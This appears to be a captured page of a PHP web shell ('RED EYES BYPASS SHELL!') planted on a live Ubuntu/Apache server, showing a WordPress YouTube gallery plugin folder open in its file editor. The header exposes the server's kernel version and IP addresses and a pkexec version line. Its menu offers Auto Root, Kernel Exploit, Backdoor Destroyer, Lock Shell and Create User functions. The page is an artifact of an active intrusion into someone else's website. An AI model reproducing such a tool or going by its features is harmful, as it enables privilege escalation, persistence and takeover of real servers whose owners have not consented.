Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
plugins /
youtube-gallery-vc /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sample-data
[ DIR ]
drwxr-xr-x
prepros-6.config
17.28
KB
-rwxr-xr-x
youtube-gallery-vc.php
1006
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : youtube-gallery-vc.php
<?php /* Plugin Name: Youtube Video Gallery - Youtube Channel For WPBakery Page Builder With Video Advertising Plugin URI: http://beeteam368.com/youtube-gallery/ Description: Displays your actual complete youtube channel on your website just like its shown on youtube. Author: BeeTeam368 Author URI: http://beeteam368.com/youtube-gallery/ Version: 2.0.8 License: Commercial Text Domain: youtube_video_gallery */ if(!defined('ABSPATH')){ die('-1'); } if(!defined('YT_BETE_VER')){ define('YT_BETE_VER','2.0.8'); }; if(!defined('YT_BETE_PLUGIN_URL')){ define('YT_BETE_PLUGIN_URL', plugin_dir_url(__FILE__)); }; if(!defined('YT_BETE_PLUGIN_PATH')){ define('YT_BETE_PLUGIN_PATH', plugin_dir_path(__FILE__)); }; if(!defined('YT_BETE_PREFIX')){ define('YT_BETE_PREFIX', 'yt_bt_'); }; require_once('includes/reg-shortcode/reg-shortcode.php'); require_once('includes/reg-vc/reg-vc.php'); require_once('includes/plugin-settings/plugin-settings.php'); require_once('sample-data/sample-data.php');
Close